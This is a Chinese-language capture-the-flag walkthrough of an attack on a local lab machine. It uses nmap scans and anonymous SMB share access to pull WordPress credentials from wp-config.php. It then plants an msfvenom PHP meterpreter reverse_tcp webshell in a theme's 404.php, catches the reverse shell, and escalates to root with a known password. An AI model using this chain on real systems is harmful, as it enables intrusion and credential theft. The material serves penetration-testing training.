SMB信息泄露
SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445
SMB协议,计算机可以访问网络资源,下载对应的资源文件
实战练习
探测靶场地址
先确定kali linux ip地址
ifconfig
然后检测同物理段ip地址
nmap -sP 192.168.190.1/24
靶机地址应该为192.168.190.131,可以信息探测一下确定
信息探测
渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限
挖掘开放服务信息:nmap -sV 192.168.190.131
挖掘靶场全部信息:nmap -A -v -T4 IP
分析探测结果
每一个服务对应计算机的一个端口,用来进行通信。常用端口0~1023端口,在扫描结果中查找特殊端口
针对特殊端口进行探测,尤其对开发大端口的http服务进行排查;
针对SMB协议弱点分析
1.SMB协议。使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;
--smbclient-L IP
空密码登录
-- smbclient '\\IP\print$'
-- smbclient '\\IP\share$'
--smbclient '\\192.168.190.131\IPC$'
可以看出空链接没有什么利用价值
接下来我们探测一下敏感信息
– get敏感文件
接下来来看一下wordpress文件夹
配置文件中一般是有用户名和密码的,所以我们查看一下配置文件
先下载
get wp-config.php
在查看
cat wp-config.php
我们可以注意到用户名和密码
接下来我们远程登陆一下mysql数据库
发现并不能登录远程服务器
所以我们使用一下ssh进行登录,这里的密码就是wp-config.php里的密码,这里服务关闭
我们可以用以下方法重新打开wp-config.php
2.针对SMB协议远程溢出漏洞进行分析;
先探测一下靶场全部信息,探测出版本号
nmap -A -v -T4 192.168.190.131
– searchsploit samba版本号
这里可以看到没有任何结果信息,如果有的话我们可以直接获取靶场信息
针对HTTP协议弱点分析
1.浏览器查看网站;扫描网站
dirb http://192.168.190.131/
打开此链接http://192.168.190.131/wordpress/wp-admin/admin.php
然后登陆成功后进入后台界面
2.寻找突破点,目标登录后台, 上传webshell;
制作webshelI
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw
然后切换至桌面,将php文件复制到webshell.php
设置监听
msfconsole
msf >use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_ tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler)> set lport 4444
msf exploit(handler)> run
上传webshell
打开此界面
将webshell.php中的代码复制到404代码中,并且update file
访问具有webshell的php界面
获得反弹的shell
wordpress 上传点 theme 404.php
执行:http://靶场ip/wordpress/wp-content/thems/twentyfifteen/404.php
查找flag信息
优化终端: python -c "import pty; pty.spawn( “/bin/bash”)’
查找敏感信息,提升root权限,查看flag值。
查找用户名: cat /etc/passwd
查找密码:在共享目录下的敏感文件,提升权限
togie这个用户很重要(密码12345)
– su用户名
– sudo -I
– su sudo
切换到root用户
接下来获取flag值
cat flag.txt